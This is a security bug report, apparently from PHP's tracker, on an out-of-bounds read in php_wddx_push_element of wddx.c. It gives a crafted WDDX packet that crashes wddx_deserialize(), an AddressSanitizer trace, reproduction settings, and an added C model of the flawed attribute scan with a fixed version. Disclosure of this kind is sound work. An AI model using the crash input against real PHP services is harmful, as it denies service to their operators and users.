PHP 7.0.10 Out-Of-Bounds Read in php_wddx_push_element of wddx.c
Posted on 30 November -0001
Description:
------------
CREDIT
-----------------------
This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB.

PHP VERSION
-----------------------
./sapi/cli/php --version
PHP 7.2.0-dev (cli) (built: Sep 11 2016 18:37:49) ( NTS )
Copyright (c) 1997-2016 The PHP Group
Zend Engine v3.1.0-dev, Copyright (c) 1998-2016 Zend Technologies

PROOF-OF-CONCEPT FILE
-----------------------
Posted in the "Test script" section.

STACKTRACE
-----------------------
Posted in the "Actual result" section.

VULNERABILITY DETAILS
-----------------------
wddx_deserialize() crashes (denial of service) on the packet below. The stack trace shows strcmp() called from php_wddx_push_element (ext/wddx/wddx.c:791) on a null pointer while expat delivers the attribute list of a <var> element; in the AddressSanitizer build the process receives SEGV at address 0. The first <var> in the packet carries the attribute Name="name": the key is mis-cased, and its value is the literal string "name", which is the kind of input that trips a scan over the key/value array comparing every slot against "name" rather than only the key slots. Reading past the NULL terminator of that array is consistent with the out-of-bounds read named in the title; the null dereference inside strcmp() is the observed symptom.

To reproduce this issue, run
export USE_ZEND_ALLOC=0
before executing the test script, so that the Zend memory manager is bypassed and AddressSanitizer sees the raw heap.

Test script:
---------------
<?php
$xml = <<<XML
<?xml version='1.0' ?>
<!DOCTYPE et SYSTEM 'w'>
<wddxPacket ven='1.0'>
<array>
<var Name="name">
<boolean value="keliu"></boolean>
</var>
<var name="1111">
<var name="2222">
<var name="3333"></var>
</var>
</var>
</array>
</wddxPacket>
XML;
$array = wddx_deserialize($xml);
var_dump($array);
?>

Expected result:
----------------
Exit quietly.
Actual result:
--------------
==47769==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000046fb9c bp 0x7ffc278e29b0 sp 0x7ffc278e2130 T0)
    #0 0x46fb9b in __interceptor_strcmp.part.24 (php-src/sapi/cli/php+0x46fb9b)
    #1 0xac41d4 in php_wddx_push_element php-src/ext/wddx/wddx.c:791:9
    #2 0x7fa8715ac67f in _init (/lib/x86_64-linux-gnu/libexpat.so.1+0x867f)
    #3 0x7fa8715ad38b in _init (/lib/x86_64-linux-gnu/libexpat.so.1+0x938b)
    #4 0x7fa8715aecad in _init (/lib/x86_64-linux-gnu/libexpat.so.1+0xacad)
    #5 0x7fa8715af404 in _init (/lib/x86_64-linux-gnu/libexpat.so.1+0xb404)
    #6 0x7fa8715b170a in XML_ParseBuffer (/lib/x86_64-linux-gnu/libexpat.so.1+0xd70a)
    #7 0xac1717 in php_wddx_deserialize_ex php-src/ext/wddx/wddx.c:1081:2
    #8 0xabad7a in zif_wddx_deserialize php-src/ext/wddx/wddx.c:1299:2
    #9 0xfdfb3d in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER php-src/Zend/zend_vm_execute.h:675:2
    #10 0xe75f4b in execute_ex php-src/Zend/zend_vm_execute.h:432:7
    #11 0xe76ec3 in zend_execute php-src/Zend/zend_vm_execute.h:474:2
    #12 0xd00e9e in zend_execute_scripts php-src/Zend/zend.c:1464:4
    #13 0xad4425 in php_execute_script php-src/main/main.c:2537:14
    #14 0x10fca26 in do_cli php-src/sapi/cli/php_cli.c:990:5
    #15 0x10f9f60 in main php-src/sapi/cli/php_cli.c:1378:18
    #16 0x7fa86fec582f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
    #17 0x449578 in _start (php-src/sapi/cli/php+0x449578)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (php-src/sapi/cli/php+0x46fb9b) in __interceptor_strcmp.part.24
==47769==ABORTING
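The following C program is an added illustration of the attribute-scan mistake the trace points at; it is not code from the report or from php-src. expat hands a start-element callback its attributes as a NULL-terminated array of alternating keys and values, so skip_scan_overrun() models (as an assumption about the loop at wddx.c:791, not a quotation of it) a scan that compares every slot against "name" and advances with ++i on a match; instead of dereferencing, it returns the first index past the terminator that such a loop would touch. attr_value() is the hardened form, walking the array in key/value pairs and stopping at the terminator. The two attribute lists poc_var_atts and good_var_atts are constructed here to mirror the first two <var> elements of the PoC packet.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Attribute lists as expat passes them to a start-element handler:
   key, value, key, value, ..., NULL.  Constructed to mirror the first
   two <var> elements of the PoC packet (not taken from php-src). */
static const char *const poc_var_atts[]  = { "Name", "name", NULL };
static const char *const good_var_atts[] = { "name", "1111", NULL };

/* Model of a scan that compares every slot against key and, on a match,
   steps forward with ++i to read the value.  This is an assumed shape for
   the loop at wddx.c:791, not the page's code.  Rather than dereferencing,
   it returns the first index beyond the NULL terminator that the loop would
   read, or -1 if the loop exits cleanly. */
static int skip_scan_overrun(const char *const *atts, const char *key)
{
    size_t term = 0;
    size_t i;

    while (atts[term] != NULL)
        term++;                      /* index of the NULL terminator */

    for (i = 0; ; i++) {
        if (i > term)
            return (int)i;           /* loop would read past the terminator */
        if (atts[i] == NULL)
            return -1;               /* normal exit at the terminator */
        if (strcmp(atts[i], key) == 0) {
            ++i;                     /* step to the slot assumed to hold the value */
            if (atts[i] != NULL && atts[i][0] != '\0')
                return -1;           /* non-empty value found: loop breaks */
            /* value slot is NULL or empty: the loop continues, and the
               for-increment advances from the value slot, so a NULL here
               means the next read lands beyond the terminator */
        }
    }
}

/* Hardened lookup: attributes come in key/value pairs, so step by two and
   stop at the terminator without ever indexing beyond it.  Keys are
   compared case-sensitively, so the PoC's "Name" is simply not found. */
static const char *attr_value(const char *const *atts, const char *key)
{
    size_t i;

    if (atts == NULL)
        return NULL;
    for (i = 0; atts[i] != NULL && atts[i + 1] != NULL; i += 2) {
        if (strcmp(atts[i], key) == 0)
            return atts[i + 1];
    }
    return NULL;
}

int main(void)
{
    const char *v;

    printf("skip-scan on Name=\"name\": first out-of-range index = %d\n",
           skip_scan_overrun(poc_var_atts, "name"));
    printf("skip-scan on name=\"1111\": first out-of-range index = %d\n",
           skip_scan_overrun(good_var_atts, "name"));

    v = attr_value(poc_var_atts, "name");
    printf("paired lookup on Name=\"name\": %s\n", v ? v : "(no name attribute)");
    v = attr_value(good_var_atts, "name");
    printf("paired lookup on name=\"1111\": %s\n", v ? v : "(no name attribute)");
    return 0;
}
```

On the PoC list the value slot "name" matches the key, the ++i step lands on the terminator at index 2, and the next iteration would read index 3, one past the end of what expat allocated; whether that slot holds NULL (the SEGV at address 0 in the trace) or a stale pointer depends on the heap, which is why the report asks for USE_ZEND_ALLOC=0 so ASan can see it. The paired walk never evaluates a value slot as a key and cannot run past the terminator.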